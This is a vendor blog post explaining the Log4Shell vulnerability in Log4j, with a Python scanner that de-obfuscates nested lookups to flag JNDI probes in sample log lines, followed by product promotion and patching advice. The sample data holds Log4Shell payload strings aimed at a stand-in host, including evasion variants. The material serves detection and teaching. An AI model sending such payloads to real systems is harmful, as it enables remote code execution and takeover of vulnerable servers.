How to Ensure You are Protected from Log4j and Similar Vulnerabilities
The Log4j vulnerability, which could potentially impact the entire internet, is making headlines, and if you are scrambling to address it, you are not alone. At CoreStack, our teams immediately audited our code for this vulnerability and were relieved to reconfirm that our products are not affected. As a cloud governance company that helps enterprises identify and mitigate security risks, we are well placed to help our customers address this flaw.
Let’s take a minute to understand what the Log4j vulnerability is all about. Log4j is a popular Java-based logging library; the flaw disclosed in it is tracked as CVE-2021-44228 and nicknamed “Log4Shell.” Millions of websites and applications use this library to perform an almost mundane activity: logging information. Logs, each tagged with a severity level, help operators identify and correlate important events, such as a drop in performance or user login and logout timestamps, and help developers troubleshoot.
The flaw allows unauthenticated remote code execution (RCE). Normally a logging library just takes the text of the log message, adds a timestamp, a severity level (such as debug, info, warn or error) and other context, and writes the result to a file, the console or a remote log collector.
To exploit this vulnerability, an attacker places a specially crafted string, typically of the form ${jndi:ldap://attacker-host/path}, in any input the application logs, such as an HTTP header, a username or a search query. Vulnerable versions of Log4j treat ${...} inside a log message as a lookup to be expanded, so the logging system uses the Java Naming and Directory Interface (JNDI) to make a Lightweight Directory Access Protocol (LDAP) request to the attacker’s server. That server responds with a reference to a malicious Java class, which the target loads and executes, giving the attacker code execution with the privileges of the logging application. Cyber-criminals can completely take over websites and online applications, allowing them to steal data, money and access. Reports at the time of writing show compromised machines being used for data exfiltration and for cryptocurrency mining.
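The lookup expansion described above is also what makes the attack string easy to obfuscate: Log4j expands nested lookups innermost-first, so ${${lower:J}ndi:...} or ${${::-j}ndi:...} ends up as ${jndi:...} by the time it matters, and a naive search for the literal text "jndi" misses it. The following is an added example, not CoreStack’s code or Log4j’s; it mimics only the pieces of Log4j’s substitution that attackers used for hiding (the :-default syntax and the lower/upper lookups) and runs over a handful of constructed access-log lines to report which ones carry a JNDI lookup and where it points. Host names such as attacker.example and the sample lines are made up.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample access-log lines (not captured from any real system).
# Lines 1-2 are benign; lines 3-5 carry Log4Shell probes in the User-Agent
# field, including the nested-lookup obfuscations seen in the wild.
SAMPLE_LINES = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.6 - - "GET /search?q=${env:HOME} HTTP/1.1" 200 "curl/7.79"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - "GET / HTTP/1.1" 200 "${${lower:J}ndi:${lower:L}dap://attacker.example/a}"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
]

# An innermost ${...} lookup: no further '$', '{' or '}' inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def resolve_lookup(body: str) -> str:
    """Expand one innermost lookup the way Log4j 2.x string substitution does.

    Only the pieces attackers used to hide the word 'jndi' are modelled:
      ${name:-default}  -> default   (also the degenerate ${::-x} -> x)
      ${lower:TEXT}     -> text
      ${upper:text}     -> TEXT
    Any other lookup (env, sys, date, ...) is left as its literal body, so
    nothing is substituted from the scanning host's own environment and the
    loop in expand_lookups always terminates.
    """
    if ":-" in body:
        return body.partition(":-")[2]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return body


def expand_lookups(text: str, max_steps: int = 500) -> tuple[str, list[str]]:
    """Expand nested lookups innermost-first until none remain.

    Returns the de-obfuscated text and the list of JNDI targets found. A JNDI
    lookup is recorded rather than resolved, because in a vulnerable Log4j this
    is the point where the outbound LDAP/RMI connection would be made.
    """
    targets: list[str] = []
    for _ in range(max_steps):
        match = INNERMOST_LOOKUP.search(text)
        if match is None:
            break
        body = match.group(1)
        if body[:5].lower() == "jndi:":        # lookup prefixes are case-insensitive
            targets.append(body[5:])
            replacement = body                 # keep it visible, drop the ${ } and move on
        else:
            replacement = resolve_lookup(body)
        text = text[: match.start()] + replacement + text[match.end():]
    return text, targets


@dataclass
class Finding:
    line_no: int
    targets: list[str]
    decoded: str


def scan_lines(lines: list[str]) -> list[Finding]:
    """Run the expander over each line and report those containing a JNDI lookup."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        decoded, targets = expand_lookups(line)
        if targets:
            findings.append(Finding(line_no, targets, decoded))
    return findings


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LINES):
        print(f"line {finding.line_no}: JNDI lookup -> {finding.targets}")
        print(f"  decoded: {finding.decoded}")
```

Point this at whatever fields actually reach Log4j (request headers, usernames, form values), not only the access log, since the payload is triggered by logging, not by any particular URL. A hit means an attempt was made, not that it succeeded; outbound LDAP or RMI connections from the application host to the reported target are the stronger indicator of compromise. Scanning detects probes; it does not fix the library, so it complements rather than replaces upgrading Log4j.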
According to data from the cybersecurity firm Check Point, more than 100 exploitation attempts per minute were being observed at the time of writing.
Jen Easterly, head of the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), stated it to be one of the most severe flaws she has seen in her career. Easterly said a growing set of hackers are actively exploiting the vulnerability.
How CoreStack can help
CoreStack helps organizations implement proactive and preventive governance guardrails, and identify and mitigate risks to their environment. The vulnerability reports and compliance assessments in CoreStack’s continuous governance platform are helpful here. The platform also has anomaly detection that alerts on changes to the infrastructure, such as spikes in network traffic, CPU utilization and cloud costs.
Once a Log4Shell payload lands, the attacker’s code runs with the privileges of the logging application, and what follows looks like any other command-and-control takeover: new outbound connections, new processes and attempts to gain further privileges. CoreStack’s SecOps Posture Dashboard provides visibility and actionable alerts for threats, vulnerabilities and guardrail assessment failures, and compliance checks can be added quickly so that customers can assess their preparedness. Detection and governance alerts complement, rather than replace, the fix itself: every affected copy of Log4j 2 must be upgraded to a patched release or, where that cannot be done immediately, have the JndiLookup class removed from its jar. A combination of manual and automatic checks will be needed, since Log4j is frequently bundled inside other applications and nested jars. Implementing solid tagging governance and using templates help build a uniform security and compliance footprint across your cloud infrastructure.
For more detailed information about CoreStack’s solution for continuous and autonomous cloud security, sign up for a demo at corestack.io/discover
More information on this security flaw that could impact the entire Internet can be found here: